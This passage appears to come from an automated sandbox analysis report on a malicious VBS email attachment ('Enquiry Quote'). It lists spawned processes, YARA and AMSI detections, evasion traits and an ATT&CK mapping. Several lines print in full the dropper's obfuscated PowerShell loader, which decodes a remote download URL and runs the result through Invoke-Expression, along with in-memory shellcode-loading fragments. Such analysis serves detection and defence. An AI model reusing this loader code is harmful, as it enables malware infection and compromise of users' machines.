,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAAC06B4F6 15_2_00007FFAAC06B4F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAAC06C2A2 15_2_00007FFAAC06C2A2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAAC13088D 15_2_00007FFAAC13088D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04A8F1F0 19_2_04A8F1F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04A8FAC0 19_2_04A8FAC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04A8EEA8 19_2_04A8EEA8
              Source: Enquiry Quote - 24071834-01.vbs Initial sample: Strings found which are bigger than 50
              Source: amsi32_3024.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3024, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@9/8@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Woes.uds
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmb5p4uc.t0y.ps1
              Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8084
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3024
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Enquiry Quote - 24071834-01.vbs Virustotal: Detection: 9%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. 
Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, gpapi.dll, cryptnet.dll, iphlpapi.dll, winnsi.dll, winhttp.dll, ondemandconnroutehelper.dll, mswsock.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, cabinet.dll, mpr.dll, scrrun.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000013.00000002.2559116933.000000000777F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdbRZ source: powershell.exe, 00000013.00000002.2559116933.000000000771C000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match File source: 00000013.00000002.2567702655.0000000009DB3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000013.00000002.2567559021.0000000008B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000013.00000002.2550702407.0000000005ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Skidoo)$global:Indskudsstningers = [System.Text.Encoding]::ASCII.GetString($Involverede)$global:Nematocyst=$Indskudsstningers.substring($Tilvendelsens237,$Urocentrummets)<#Driftsresu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Phoronidea $Jailor $brochureblade), (Ketil234 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Translokationernes = [AppDomain]::CurrentDomain.GetAssemblies
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Appellanter)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Skyttekdens, $false).DefineType($Sidelbende,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Skidoo)$global:Indskudsstningers = [System.Text.Encoding]::ASCII.GetString($Involverede)$global:Nematocyst=$Indskudsstningers.substring($Tilvendelsens237,$Urocentrummets)<#Driftsresu
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. 
auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. 
Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAAC135479 push ebp; iretd 15_2_00007FFAAC135538
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04A8EC78 pushfd; retf 19_2_04A8EC79
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04A817DF push ebx; ret 19_2_04A8189A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04A8188C push ebx; ret 19_2_04A8189A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_076C30AB push dword ptr [ebp+ebx-75h]; iretd 19_2_076C30B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_076C1D28 push eax; mov dword ptr [esp], ecx 19_2_076C21B4
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5009
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4838
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6793
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2950
              Source: C:\Windows\System32\wscript.exe TID: 5892 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1340 Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6092 Thread sleep count: 6793 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1252 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1056 Thread sleep count: 2950 > 30
              Source: wscript.exe, 00000000.00000003.1272521798.000001BBF8142000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264409533.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267175366.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263586854.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272148773.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2559116933.000000000777F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000000.00000003.1263586854.000001BBF9FC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272148773.000001BBF9FC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264409533.000001BBF9FC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267175366.000001BBF9FC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW)
              Source: powershell.exe, 0000000F.00000002.2642359454.000001FAE72FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0499D6F8 LdrInitializeThunk, 19_2_0499D6F8

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match File source: amsi64_8084.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 3024, type: MEMORYSTR
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
              | Gather Victim Identity Information | 121 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 121 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | 21 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
